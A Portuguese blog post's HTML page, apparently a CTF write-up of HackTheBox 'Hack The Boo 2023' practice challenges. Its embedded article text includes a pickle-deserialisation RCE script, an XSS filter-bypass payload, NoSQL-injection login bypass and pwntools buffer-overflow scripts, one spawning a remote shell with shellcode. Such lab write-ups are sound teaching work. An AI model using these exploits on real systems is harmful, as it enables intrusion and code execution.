<!DOCTYPE html>
<html lang="pt" dir="auto">

<head><meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="robots" content="index, follow">
<title>HackTheBox - Hack The Boo 2023 - Practice | tomiodarim</title>
<meta name="keywords" content="write-up, hackthebox, ctf, hacktheboo">
<meta name="description" content="Neste ano, o Hack The Boo se dividiu em duas partes: Practice e Competition. Este write-up é sobre a Practice que apresentou 16 desafios de dificuldade fácil. Abaixo, você encontrará a resolução de 13 desses desafios que consegui concluir. Restaram apenas três: um de criptografia, um de reversão e um de web.
Crypto Hexoding Nesse desafio recebemos um arquivo script de python e um arquivo de texto com o seguinte conteúdo:">
<meta name="author" content="Lucas Tomio Darim">
<link rel="canonical" href="https://tomiodarim.io/posts/htb-boo23_practice/">
<link crossorigin="anonymous" href="/assets/css/stylesheet.5a101feaed2bc000d60de8365173a1aa6c75665853dcc863f92f59ea5ace5d74.css" integrity="sha256-WhAf6u0rwADWDeg2UXOhqmx1ZlhT3Mhj&#43;S9Z6lrOXXQ=" rel="preload stylesheet" as="style">
<script defer crossorigin="anonymous" src="/assets/js/highlight.20cbcab8eadb4b1c256e6db331b0130fc305cd882d8b91865e9b6473e8ec5c24.js" integrity="sha256-IMvKuOrbSxwlbm2zMbATD8MFzYgti5GGXptkc&#43;jsXCQ="
    onload="hljs.initHighlightingOnLoad();"></script>
<link rel="icon" href="https://tomiodarim.io/images/favicon.ico">
<link rel="icon" type="image/png" sizes="16x16" href="https://tomiodarim.io/images/favicon-16x16.png">
<link rel="icon" type="image/png" sizes="32x32" href="https://tomiodarim.io/images/favicon-32x32.png">
<link rel="apple-touch-icon" href="https://tomiodarim.io/apple-touch-icon.png">
<link rel="mask-icon" href="https://tomiodarim.io/safari-pinned-tab.svg">
<meta name="theme-color" content="#2e2e33">
<meta name="msapplication-TileColor" content="#2e2e33">
<noscript>
    <style>
        #theme-toggle,
        .top-link {
            display: none;
        }

    </style>
    <style>
        @media (prefers-color-scheme: dark) {
            :root {
                --theme: rgb(29, 30, 32);
                --entry: rgb(46, 46, 51);
                --primary: rgb(218, 218, 219);
                --secondary: rgb(155, 156, 157);
                --tertiary: rgb(65, 66, 68);
                --content: rgb(196, 196, 197);
                --hljs-bg: rgb(46, 46, 51);
                --code-bg: rgb(55, 56, 62);
                --border: rgb(51, 51, 51);
            }

            .list {
                background: var(--theme);
            }

            .list:not(.dark)::-webkit-scrollbar-track {
                background: 0 0;
            }

            .list:not(.dark)::-webkit-scrollbar-thumb {
                border-color: var(--theme);
            }
        }

    </style>
</noscript><meta property="og:title" content="HackTheBox - Hack The Boo 2023 - Practice" />
<meta property="og:description" content="Neste ano, o Hack The Boo se dividiu em duas partes: Practice e Competition. Este write-up é sobre a Practice que apresentou 16 desafios de dificuldade fácil. Abaixo, você encontrará a resolução de 13 desses desafios que consegui concluir. Restaram apenas três: um de criptografia, um de reversão e um de web.
Crypto Hexoding Nesse desafio recebemos um arquivo script de python e um arquivo de texto com o seguinte conteúdo:" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://tomiodarim.io/posts/htb-boo23_practice/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2023-10-28T00:00:00+00:00" />
<meta property="article:modified_time" content="2023-10-28T00:00:00+00:00" />

<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="HackTheBox - Hack The Boo 2023 - Practice"/>
<meta name="twitter:description" content="Neste ano, o Hack The Boo se dividiu em duas partes: Practice e Competition. Este write-up é sobre a Practice que apresentou 16 desafios de dificuldade fácil. Abaixo, você encontrará a resolução de 13 desses desafios que consegui concluir. Restaram apenas três: um de criptografia, um de reversão e um de web.
Crypto Hexoding Nesse desafio recebemos um arquivo script de python e um arquivo de texto com o seguinte conteúdo:"/>


<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "BreadcrumbList",
  "itemListElement": [
    {
      "@type": "ListItem",
      "position":  1 ,
      "name": "Posts",
      "item": "https://tomiodarim.io/posts/"
    }, 
    {
      "@type": "ListItem",
      "position":  2 ,
      "name": "HackTheBox - Hack The Boo 2023 - Practice",
      "item": "https://tomiodarim.io/posts/htb-boo23_practice/"
    }
  ]
}
</script>
<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "BlogPosting",
  "headline": "HackTheBox - Hack The Boo 2023 - Practice",
  "name": "HackTheBox - Hack The Boo 2023 - Practice",
  "description": "Neste ano, o Hack The Boo se dividiu em duas partes: Practice e Competition. Este write-up é sobre a Practice que apresentou 16 desafios de dificuldade fácil. Abaixo, você encontrará a resolução de 13 desses desafios que consegui concluir. Restaram apenas três: um de criptografia, um de reversão e um de web.\nCrypto Hexoding Nesse desafio recebemos um arquivo script de python e um arquivo de texto com o seguinte conteúdo:",
  "keywords": [
    "write-up", "hackthebox", "ctf", "hacktheboo"
  ],
  "articleBody": "Neste ano, o Hack The Boo se dividiu em duas partes: Practice e Competition. Este write-up é sobre a Practice que apresentou 16 desafios de dificuldade fácil. Abaixo, você encontrará a resolução de 13 desses desafios que consegui concluir. Restaram apenas três: um de criptografia, um de reversão e um de web.\nCrypto Hexoding Nesse desafio recebemos um arquivo script de python e um arquivo de texto com o seguinte conteúdo:\n4854427b6b6e3077316e675f6830775f74305f3164336e743166795f336e633064316e675f736368336d33735f31735f6372756331346c5f6630725f615f Y3J5cHQwZ3I0cGgzcl9fXzRsczBfZDBfbjB0X2MwbmZ1czNfZW5jMGQxbmdfdzF0aF9lbmNyeXA1MTBuIX0= A primeira linha está codificada em hexadecimal e a segunda em Base64. Ao decodificar, obtemos as seguintes partes:\nHTB{kn0w1ng_h0w_t0_1d3nt1fy_3nc0d1ng_sch3m3s_1s_cruc14l_f0r_a_ crypt0gr4ph3r___4ls0_d0_n0t_c0nfus3_enc0d1ng_w1th_encryp510n!} Portanto, a flag é HTB{kn0w1ng_h0w_t0_1d3nt1fy_3nc0d1ng_sch3m3s_1s_cruc14l_f0r_a_crypt0gr4ph3r___4ls0_d0_n0t_c0nfus3_enc0d1ng_w1th_encryp510n!}.\nSPG Nesse segundo desafio de crypto recebemos um código de python e um arquivo de texto. O script gera uma senha baseada em uma master key e encripta a flag também utilizando essa master key. Por fim, a senha e a flag encriptada são escritas no arquivo de output.\ndef main(): password = generate_password() encryption_key = sha256(MASTER_KEY).digest() cipher = AES.new(encryption_key, AES.MODE_ECB) ciphertext = cipher.encrypt(pad(FLAG, 16)) print(f'Your Password : {password}\\nEncrypted Flag : {b64encode(ciphertext).decode()}') O arquivo output.txt contém as seguintes informações:\nYour Password : gBv#3%DXMV*7oCN2M71Zfe0QY^dS3ji7DgHxx2bNRCSoRPlVRRX*bwLO5eM\u00260AIOa\u0026#$@u Encrypted Flag : tnP+MdNjHF1aMJVV/ciAYqQutsU8LyxVkJtVEf0J0T5j8Eu68AxcsKwd0NjY9CE+Be9e9FwSVF2xbK1GP53WSAaJuQaX/NC02D+v7S/yizQ= A senha é gerada a partir de uma master key, utilizando um alfabeto que inclui letras maiúsculas e minúsculas, dígitos e caracteres especiais. O algoritmo percorre cada bit da master key, escolhendo um caractere aleatório da primeira metade do alfabeto se o bit for 1, e da segunda metade se for 0.\nALPHABET = string.ascii_letters + string.digits + '~!@#$%^\u0026*' def generate_password(): master_key = int.from_bytes(MASTER_KEY, 'little') password = '' while master_key: bit = master_key \u0026 1 if bit: password += random.choice(ALPHABET[:len(ALPHABET)//2]) else: password += random.choice(ALPHABET[len(ALPHABET)//2:]) master_key \u003e\u003e= 1 return password A questão aqui é que é possível deduzir a master key a partir da senha gerada, devido à relação direta com as partes do alfabeto em que cada caractere da senha se encontra. Além disso, como a geração da senha percorreu os bits da master key do menos significativo para o mais significativo, acabamos obtendo os bits invertidos, exigindo, assim, uma reversão. Adicionalmente, ao converter a master key de bytes para int, foi empregado o formato little endian, o que implica que, após obter os bytes da master key, é necessário realizar uma inversão adicional.\nAgora que possuímos a master key podemos descriptografar a flag utilizando o mesmo algoritmos que foi usado para encriptar, nesse caso o AES no modo ECB. E quando a flag foi escrita no output ela foi codificada para Base64 então é necessário decodificar antes.\nPor fim temos o seguinte script para obter a flag:\nimport string from base64 import b64decode from hashlib import sha256 from Crypto.Cipher import AES from Crypto.Util.number import long_to_bytes ALPHABET = string.ascii_letters + string.digits + '~!@#$%^\u0026*' senha = 'gBv#3%DXMV*7oCN2M71Zfe0QY^dS3ji7DgHxx2bNRCSoRPlVRRX*bwLO5eM\u00260AIOa\u0026#$@u' flag = 'tnP+MdNjHF1aMJVV/ciAYqQutsU8LyxVkJtVEf0J0T5j8Eu68AxcsKwd0NjY9CE+Be9e9FwSVF2xbK1GP53WSAaJuQaX/NC02D+v7S/yizQ=' masterKey = '' for ch in senha: masterKey += '1' if ch in ALPHABET[:len(ALPHABET)//2] else '0' masterKey = masterKey[::-1] masterKey = long_to_bytes(int(masterKey, 2))[::-1] encryptionKey = sha256(masterKey).digest() cipher = AES.new(encryptionKey, AES.MODE_ECB) flag = cipher.decrypt(b64decode(flag)) print(flag) Ao executar o script, a flag é revelada: HTB{00ps___n0t_th4t_h4rd_t0_r3c0v3r_th3_m4st3r_k3y_0f_my_p4ssw0rd_g3n3r4t0r}.\nForensics Spooky Phishing No desafio “Spooky Phishing”, recebemos um arquivo HTML que representa uma página de phishing. Dentro do código HTML, encontramos as seguintes linhas no início do corpo do documento:\nAo combinar os dois valores e decodificá-los, primeiro do Base64 e depois do hexadecimal, descobrimos uma URL que contém a flag HTB{sp00ky_ph1sh1ng_w1th_sp00ky_spr34dsh33ts}.\nBat Problems Agora recebemos um arquivo batch (.bat) que define várias variáveis e, em seguida, concatena o conteúdo delas para formar um comando codificado em Base64. Esse comando é posteriormente executado no PowerShell.\nPara resolver o desafio, usei o Hybrid Analysis, um serviço que fornece ambientes sandbox para executar e analisar arquivos maliciosos. Também poderia ter usado serviços semelhantes, como o any.run.\nNo relatório gerado pelo Hybrid Analysis, encontrei o comando que foi executado no PowerShell, que continha a flag: HTB{0bfusc4t3d_b4t_f1l3s_c4n_b3_4_m3ss}.\nVulnerable Season No terceiro desafio de forense, fomos fornecidos com um arquivo de logs de um servidor web que continha mais de 11 mil linhas de registros.\nDepois de analisar os logs é possível encontrar alguns que contém execução de comandos.\nSendo que o da linha 11477 contém o seguinte comando:\nNz=Eg1n;az=5bDRuQ;Mz=fXIzTm;Kz=F9nMEx;Oz=7QlRI;Tz=4xZ0Vi;Vz=XzRfdDV;echo $Mz$Tz$Vz$az$Kz$Oz|base64 -d|rev Que executando no terminal retorna a flag HTB{L0g_@n4ly5t_4_bEg1nN3r}.\nReversing CandyBowl Esse desafio de reverse é bem simples. É um executável que ao rodar espera 3 segundos e retorna um doce aleatório de um vetor de strings.\nUsando o comando strings conseguimos obter a flag HTB{4lw4y5_ch3ck_ur_k1d5_c4ndy}.\nGhostInTheMachine Já nesse reverse o programa apenas lê alguns bytes do /dev/urandom e imprime na tela. Fazendo um disassembly pelo GDB podemos ver que há uma função getflag antes do comportamento que podemos ver do programa.\nEntão eu defini um breakpoint na instrução que chama a função ghost pois assim já passou pela getflag. E assim ao ver a memória temos a flag HTB{ex0rc1s1ng_th3_m4ch1n3}.\nWeb CandyVault O CandyVault é um desafio de web que apresenta apenas uma página de login.\nOlhando que código-fonte que é fornecido, encontramos que a aplicação utiliza um banco de dados não relacional, o MongoDB, e que a flag é exibida quando se faz login com sucesso.\n... client = MongoClient(app.config[\"MONGO_URI\"]) ... app.route(\"/login\", methods=[\"POST\"]) def login(): ... elif content_type == \"application/json\": data = request.get_json() email = data.get(\"email\") password = data.get(\"password\") ... if user: return render_template(\"candy.html\", flag=open(\"flag.txt\").read()) ... Dessa forma utilizando um payload de NoSQL Injection podemos bypassar a tela de login e obter a flag HTB{w3lc0m3_to0o0o_th3_c44andy_v4u1t!}.\nSpook Tastic Neste desafio, nos deparamos com uma página web na qual a única ação permitida é o envio de um email para se cadastrar na newsletter localizada no final da página.\nAo examinar o código-fonte em “app.py”, podemos observar que o email fornecido é validado somente se ele contém a palavra ‘script’, conforme o seguinte trecho de código:\ndef blacklist_pass(email): email = email.lower() if \"script\" in email: return False return True Caso o email não contenha essa palavra, uma thread da função start_bot é criada. Esta função acessa a rota /bot e aguarda 3 segundos por um alerta na página. Quando um alerta é acionado, a função send_flag é chamada com o endereço IP do usuário como parâmetro.\ndef start_bot(user_ip): ... try: browser.get(f\"{HOST}/bot?token={BOT_TOKEN}\") WebDriverWait(browser, 3).until(EC.alert_is_present()) alert = browser.switch_to.alert alert.accept() send_flag(user_ip) ... A função send_flag simplesmente lê o conteúdo do arquivo “flag.txt” e o envia para todos os clientes conectados no websocket que tenham o IP fornecido como parâmetro.\ndef send_flag(user_ip): for id, ip in socket_clients.items(): if ip == user_ip: socketio.emit(\"flag\", {\"flag\": open(\"flag.txt\").read()}, room=id) A página /bot é criada a partir de um template que renderiza todos os emails, e os caracteres não seguros são escapados usando o operador ‘| safe’.\n{% for email in emails %} \u003cspan\u003e{{ email|safe }}\u003c/span\u003e\u003cbr/\u003e {% endfor %} Para obter a flag, é necessário realizar um ataque de Cross-Site Scripting (XSS) para criar um alerta que não contenha a palavra ‘script’ no payload. Isso pode ser alcançado com o seguinte payload:\n\u003cimg src=0 onerror=alert(0) /\u003e Dessa forma, recebemos a flag HTB{4l3rt5_c4us3_jumpsc4r35!!} via websocket.\nSpellbound Servants Neste desafio, somos apresentados a uma tela de login, mas, diferentemente de outros desafios, aqui temos a opção de criar uma conta.\nApós criar uma conta e fazer login, somos redirecionados para a página /home.\nAo examinar o código-fonte da aplicação, descobrimos que a validação do usuário na página inicial é feita por meio de uma função decorator chamada isAuthenticated. Essa função verifica o usuário com base em um objeto serializado passado por meio do cookie “auth”.\ndef isAuthenticated(f): @wraps(f) def decorator(*args, **kwargs): token = request.cookies.get('auth', False) if not token: return abort(401, 'Unauthorised access detected!') try: user = pickle.loads(base64.urlsafe_b64decode(token)) kwargs['user'] = user return f(*args, **kwargs) except: return abort(401, 'Unauthorised access detected!') return decorator Esse módulo pickle é vulnerável a execução de código durante a desserialização de objetos. Uma PoC para o exploit pode ser encontrada nesse artigo do exploit-notes.\nCom base nessa PoC, foi criado um script Python que explora a vulnerabilidade de execução de código remoto (RCE) para inserir a flag em um arquivo acessível no servidor web e, em seguida, faz uma requisição para obter a flag.\nimport pickle import base64 import os import requests class RCE: def __reduce__(self): cmd = ('cat /flag.txt \u003e /app/application/static/flag.txt') return os.system, (cmd,) pickled = pickle.dumps(RCE()) payload = base64.urlsafe_b64encode(pickled) url = 'http://94.237.53.58:44662' r = requests.get(f'{url}/home', cookies={'auth': payload}) print(requests.get(f'{url}/static/flag.txt').content) Ao executar esse script, a flag HTB{P1CkL3_15_f0R_SUP3R555!} é retornada.\nPwn Lesson Esse desafio é muito diferente dos outros pois é uma sequência de perguntas que devem ser respondidas certas para conseguir a flag. E há um ELF para baixar que as perguntas são baseadas nele.\n[*] Question number 0x1:\nIs this a ‘32-bit’ or ‘64-bit’ ELF? (e.g. 1337-bit)\n\u003e\u003e 64-bit\n[*] Question number 0x2:\nWhich of these 3 protections are enabled (Canary, NX, PIE)?\n\u003e\u003e NX\n[*] Question number 0x3:\nWhat do you need to enter so the message ‘Welcome admin!’ is printed?\n\u003e\u003e admin\n◉ HINT: This is the buffer –\u003e char name[0x20] = {0}; ◉\n[*] Question number 0x4:\nWhat is the size of the ’name’ buffer (in hex or decimal)?\n\u003e\u003e 32\nO valor 20 em hexadecimal pode ser convertido para 32 na base decimal.\n◉ HINT: Only functions inside ‘main()’ are called. ◉\n◉ Also, the functions these functions call. ◉\n[*] Question number 0x5:\nWhich custom function is never called? (e.g. vuln())\n\u003e\u003e under_construction\n◉ HINT: Which function reads the string from the stdin? ◉\n[*] Question number 0x6:\nWhat is the name of the standard function that could trigger a Buffer Overflow? (e.g. fprintf())\n\u003e\u003e scanf\n[*] Question number 0x7:\nInsert 30, then 39, then 40 ‘A’s in the program and see the output.\nAfter how many bytes a Segmentation Fault occurs (in hex or decimal)?\n\u003e\u003e 40\n[*] Question number 0x8:\nWhat is the address of ‘under_construction()’ in hex? (e.g. 0x401337)\n\u003e\u003e 0x4011d6\nIsso pode ser visto na penúltima imagem.\nAo responder essas 8 perguntas recebemos a flag HTB{pwn_101_w1th_s0m3_b0f}.\nLemonade Stand v1 Este desafio é uma exploração de buffer overflow. No binário fornecido, somos informados de que temos 12 moedas e podemos pedir uma limonada normal ou grande. Se inserirmos um valor diferente, o programa nos dirá que eles não vendem uvas. Ao escolher o tamanho da limonada, se tivermos moedas suficientes, elas serão deduzidas do total; caso contrário, o programa perguntará se queremos fazer um empréstimo, e se aceitarmos, ele solicitará um nome e sobrenome.\nUsando o Cutter para decompilar o programa, podemos ver um “main” bastante simples que apenas chama o menu e as funções “buy” dependendo do tamanho escolhido.\nA função “buy_large” verifica apenas se temos 5 moedas; se tivermos, as moedas são deduzidas, caso contrário, a função “save_creds” é chamada. “buy_normal” faz o mesmo, mas considera 3 moedas.\nA função “save_creds” é a que oferece uma limonada grátis ao inserir um nome e sobrenome. No entanto, o buffer alocado para salvar o sobrenome tem 64 bytes, enquanto a função “read” que lê o sobrenome é passada como argumento 0x4a, o que significa que serão lidos 74 bytes.\nAlém disso, há uma função não chamada durante a execução normal do programa chamada “grapes”, que lê o arquivo “flag.txt” e imprime o conteúdo na tela. Essa função está no endereço 0x004008cf.\nPara obter a flag, é necessário realizar um buffer overflow no array onde o sobrenome é armazenado, substituindo o endereço de retorno para o endereço da função “grapes”. Dessa forma, em vez de retornar à função “save_creds” após a leitura da entrada do usuário, o programa retornará ao endereço que especificamos.\nO programa com a flag real é executado no servidor do Hack the Box, e temos o endereço IP e a porta para nos conectar. Após a conexão, é necessário solicitar uma limonada grande três vezes para gastar todas as moedas e, em seguida, chamar a função “save_coins”. Em seguida, passamos um nome e, ao inserir o sobrenome, inserimos 72 bytes aleatórios e o endereço da função “grapes,” preenchendo assim os 74 bytes lidos.\nAqui está o script em Python para realizar o que foi explicado acima:\nimport pwn ip = '94.237.49.11' port = 44822 r = pwn.remote(ip,port) for i in range(3): r.sendlineafter('\u003e\u003e', '2') r.sendlineafter('\u003e\u003e', '1') r.sendlineafter('name: ', 'lucas') r.sendlineafter('surname: ', b'A'*72 + pwn.p64(0x004008cf)) print(r.recvall()) Ao executar esse script, obtemos a flag HTB{d0nt_45k_f0r_gr4p35_4t_4_l3m0n4d3_5t4nd}.\nMagic Trick Este último desafio de pwn também envolve a exploração de um buffer overflow. O binário fornecido possui a proteção NX desativada, mas o PIE (Position Independent Executable) ativado, o que significa que pode ser executado código na pilha, mas o endereço base vai mudar a cada execução do programa. O buffer da variável tem 64 bytes, mas, desta vez, estão sendo lidos 78 bytes.\nAo iniciar o programa, ele mostra o endereço para o qual precisamos retornar para executar o código. Esse endereço é lido e salvo em uma variável chamada “addr”. O código que será executado na memória é um shellcode que cria um shell “sh”, permitindo a execução de comandos.\nPara criar o shellcode, foi utilizada a função do próprio pwntools, e o payload contém o shellcode, alguns NOPs (bytes 0x90, indicando à CPU para não fazer nada), e o endereço de retorno da pilha.\nApós a execução do shellcode, uma shell é criada, e, em seguida, o comando ‘cat flag.txt’ é enviado para obter a flag.\nAqui está o script em Python para realizar o que foi explicado acima:\nimport pwn ip = '94.237.59.206' port = 42267 r = pwn.remote(ip,port) r.recvuntil(\"is '\") addr = int(r.recvuntil(\"'\")[:-1], 16) r.sendlineafter('\u003e\u003e ', 'y') pwn.context.arch = 'amd64' shellcode = pwn.asm(pwn.shellcraft.execve('/bin/sh')) payload = shellcode + b'\\x90' * 35 + pwn.p64(addr) r.sendlineafter('\u003e\u003e ', payload) r.sendline('cat flag.txt') print(r.recv()) Ao executar esse script, obtivemos a flag HTB{4br4_k4d4br4_sh3llc0d3}.\nCom isso termino esse write-up. Foi um CTF bem divertido em que pude rever várias coisas que não estudava já fazia um tempo, por exemplo esses buffers overflow. Agradeço a toda equipe do Hack the Box por esse CTF e a você que leu até aqui.\n",
  "wordCount" : "2306",
  "inLanguage": "pt",
  "datePublished": "2023-10-28T00:00:00Z",
  "dateModified": "2023-10-28T00:00:00Z",
  "author":{
    "@type": "Person",
    "name": "Lucas Tomio Darim"
  },
  "mainEntityOfPage": {
    "@type": "WebPage",
    "@id": "https://tomiodarim.io/posts/htb-boo23_practice/"
  },
  "publisher": {
    "@type": "Organization",
    "name": "tomiodarim",
    "logo": {
      "@type": "ImageObject",
      "url": "https://tomiodarim.io/images/favicon.ico"
    }
  }
}
</script>
</head>

<body class="" id="top">
<script>
    if (localStorage.getItem("pref-theme") === "dark") {
        document.body.classList.add('dark');
    } else if (localStorage.getItem("pref-theme") === "light") {
        document.body.classList.remove('dark')
    } else if (window.matchMedia('(prefers-color-scheme: dark)').matches) {
        document.body.classList.add('dark');
    }

</script>

<header class="header">
    <nav class="nav">
        <div class="logo">
            <a href="https://tomiodarim.io/" accesskey="h" title="tomiodarim (Alt + H)">tomiodarim</a>
            
        </div>
        <div class="logo">
            <ul id="menu">
                <li>
                    <a href="https://tomiodarim.io/" title="home">
                        <span>home</span>
                    </a>
                </li>
                <li>
                    <a href="https://tomiodarim.io/whoami/" title="whoami">
                        <span>whoami</span>
                    </a>
                </li>
                <li>
                    <a href="https://tomiodarim.io/tags/" title="tags">
                        <span>tags</span>
                    </a>
                </li>
            </ul>
            <div class="logo-switches">
                <button id="theme-toggle" accesskey="t" title="(Alt + T)">
                    <svg id="moon" xmlns="http://www.w3.org/2000/svg" width="24" height="18" viewBox="0 0 24 24"
                        fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round"
                        stroke-linejoin="round">
                        <path d="M21 12.79A9 9 0 1 1 11.21 3 7 7 0 0 0 21 12.79z"></path>
                    </svg>
                    <svg id="sun" xmlns="http://www.w3.org/2000/svg" width="24" height="18" viewBox="0 0 24 24"
                        fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round"
                        stroke-linejoin="round">
                        <circle cx="12" cy="12" r="5"></circle>
                        <line x1="12" y1="1" x2="12" y2="3"></line>
                        <line x1="12" y1="21" x2="12" y2="23"></line>
                        <line x1="4.22" y1="4.22" x2="5.64" y2="5.64"></line>
                        <line x1="18.36" y1="18.36" x2="19.78" y2="19.78"></line>
                        <line x1="1" y1="12" x2="3" y2="12"></line>
                        <line x1="21" y1="12" x2="23" y2="12"></line>
                        <line x1="4.22" y1="19.78" x2="5.64" y2="18.36"></line>
                        <line x1="18.36" y1="5.64" x2="19.78" y2="4.22"></line>
                    </svg>
                </button>
            </div>
        </div>
    </nav>
</header>
<main class="main">

<article class="post-single">
  <header class="post-header">
    <h1 class="post-title">
      HackTheBox - Hack The Boo 2023 - Practice
    </h1>
    <div class="post-meta">28 de outubro de 2023

</div>
  </header> <div class="toc">
    <details >
        <summary accesskey="c" title="(Alt + C)">
            <span class="details">Sumário</span>
        </summary>

        <div class="inner"><ul>
                <li>
                    <a href="#crypto" aria-label="Crypto">Crypto</a><ul>
                        
                <li>
                    <a href="#hexoding" aria-label="Hexoding">Hexoding</a></li>
                <li>
                    <a href="#spg" aria-label="SPG">SPG</a></li></ul>
                </li>
                <li>
                    <a href="#forensics" aria-label="Forensics">Forensics</a><ul>
                        
                <li>
                    <a href="#spooky-phishing" aria-label="Spooky Phishing">Spooky Phishing</a></li>
                <li>
                    <a href="#bat-problems" aria-label="Bat Problems">Bat Problems</a></li>
                <li>
                    <a href="#vulnerable-season" aria-label="Vulnerable Season">Vulnerable Season</a></li></ul>
                </li>
                <li>
                    <a href="#reversing" aria-label="Reversing">Reversing</a><ul>
                        
                <li>
                    <a href="#candybowl" aria-label="CandyBowl">CandyBowl</a></li>
                <li>
                    <a href="#ghostinthemachine" aria-label="GhostInTheMachine">GhostInTheMachine</a></li></ul>
                </li>
                <li>
                    <a href="#web" aria-label="Web">Web</a><ul>
                        
                <li>
                    <a href="#candyvault" aria-label="CandyVault">CandyVault</a></li>
                <li>
                    <a href="#spook-tastic" aria-label="Spook Tastic">Spook Tastic</a></li>
                <li>
                    <a href="#spellbound-servants" aria-label="Spellbound Servants">Spellbound Servants</a></li></ul>
                </li>
                <li>
                    <a href="#pwn" aria-label="Pwn">Pwn</a><ul>
                        
                <li>
                    <a href="#lesson" aria-label="Lesson">Lesson</a></li>
                <li>
                    <a href="#lemonade-stand-v1" aria-label="Lemonade Stand v1">Lemonade Stand v1</a></li>
                <li>
                    <a href="#magic-trick" aria-label="Magic Trick">Magic Trick</a>
                </li>
            </ul>
            </li>
            </ul>
        </div>
    </details>
</div>
  <div class="post-content"><p>Neste ano, o Hack The Boo se dividiu em duas partes: Practice e Competition. Este write-up é sobre a Practice que apresentou 16 desafios de dificuldade fácil. Abaixo, você encontrará a resolução de 13 desses desafios que consegui concluir. Restaram apenas três: um de criptografia, um de reversão e um de web.</p>
<p><img loading="lazy" src="/images/htb-boo23_practice/0.jpg" alt="banner"  />
</p>
<hr>
<h1 id="crypto">Crypto</h1>
<h2 id="hexoding">Hexoding</h2>
<p>Nesse desafio recebemos um arquivo script de python e um arquivo de texto com o seguinte conteúdo:</p>
<pre tabindex="0"><code>4854427b6b6e3077316e675f6830775f74305f3164336e743166795f336e633064316e675f736368336d33735f31735f6372756331346c5f6630725f615f
Y3J5cHQwZ3I0cGgzcl9fXzRsczBfZDBfbjB0X2MwbmZ1czNfZW5jMGQxbmdfdzF0aF9lbmNyeXA1MTBuIX0=
</code></pre><p>A primeira linha está codificada em hexadecimal e a segunda em Base64. Ao decodificar, obtemos as seguintes partes:</p>
<pre tabindex="0"><code>HTB{kn0w1ng_h0w_t0_1d3nt1fy_3nc0d1ng_sch3m3s_1s_cruc14l_f0r_a_
crypt0gr4ph3r___4ls0_d0_n0t_c0nfus3_enc0d1ng_w1th_encryp510n!}
</code></pre><p>Portanto, a flag é <strong>HTB{kn0w1ng_h0w_t0_1d3nt1fy_3nc0d1ng_sch3m3s_1s_cruc14l_f0r_a_crypt0gr4ph3r___4ls0_d0_n0t_c0nfus3_enc0d1ng_w1th_encryp510n!}</strong>.</p>
<h2 id="spg">SPG</h2>
<p>Nesse segundo desafio de crypto recebemos um código de python e um arquivo de texto. O script gera uma senha baseada em uma master key e encripta a flag também utilizando essa master key. Por fim, a senha e a flag encriptada são escritas no arquivo de output.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
</span></span><span class="line"><span class="cl">    <span class="n">password</span> <span class="o">=</span> <span class="n">generate_password</span><span class="p">()</span>
</span></span><span class="line"><span class="cl">    <span class="n">encryption_key</span> <span class="o">=</span> <span class="n">sha256</span><span class="p">(</span><span class="n">MASTER_KEY</span><span class="p">)</span><span class="o">.</span><span class="n">digest</span><span class="p">()</span>
</span></span><span class="line"><span class="cl">    <span class="n">cipher</span> <span class="o">=</span> <span class="n">AES</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="n">encryption_key</span><span class="p">,</span> <span class="n">AES</span><span class="o">.</span><span class="n">MODE_ECB</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">ciphertext</span> <span class="o">=</span> <span class="n">cipher</span><span class="o">.</span><span class="n">encrypt</span><span class="p">(</span><span class="n">pad</span><span class="p">(</span><span class="n">FLAG</span><span class="p">,</span> <span class="mi">16</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;Your Password : </span><span class="si">{</span><span class="n">password</span><span class="si">}</span><span class="se">\n</span><span class="s1">Encrypted Flag : </span><span class="si">{</span><span class="n">b64encode</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">)</span><span class="o">.</span><span class="n">decode</span><span class="p">()</span><span class="si">}</span><span class="s1">&#39;</span><span class="p">)</span>
</span></span></code></pre></div><p>O arquivo output.txt contém as seguintes informações:</p>
<pre tabindex="0"><code>Your Password : gBv#3%DXMV*7oCN2M71Zfe0QY^dS3ji7DgHxx2bNRCSoRPlVRRX*bwLO5eM&amp;0AIOa&amp;#$@u
Encrypted Flag : tnP+MdNjHF1aMJVV/ciAYqQutsU8LyxVkJtVEf0J0T5j8Eu68AxcsKwd0NjY9CE+Be9e9FwSVF2xbK1GP53WSAaJuQaX/NC02D+v7S/yizQ=
</code></pre><p>A senha é gerada a partir de uma master key, utilizando um alfabeto que inclui letras maiúsculas e minúsculas, dígitos e caracteres especiais. O algoritmo percorre cada bit da master key, escolhendo um caractere aleatório da primeira metade do alfabeto se o bit for 1, e da segunda metade se for 0.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="n">ALPHABET</span> <span class="o">=</span> <span class="n">string</span><span class="o">.</span><span class="n">ascii_letters</span> <span class="o">+</span> <span class="n">string</span><span class="o">.</span><span class="n">digits</span> <span class="o">+</span> <span class="s1">&#39;~!@#$%^&amp;*&#39;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">generate_password</span><span class="p">():</span>
</span></span><span class="line"><span class="cl">    <span class="n">master_key</span> <span class="o">=</span> <span class="nb">int</span><span class="o">.</span><span class="n">from_bytes</span><span class="p">(</span><span class="n">MASTER_KEY</span><span class="p">,</span> <span class="s1">&#39;little&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">password</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">while</span> <span class="n">master_key</span><span class="p">:</span>
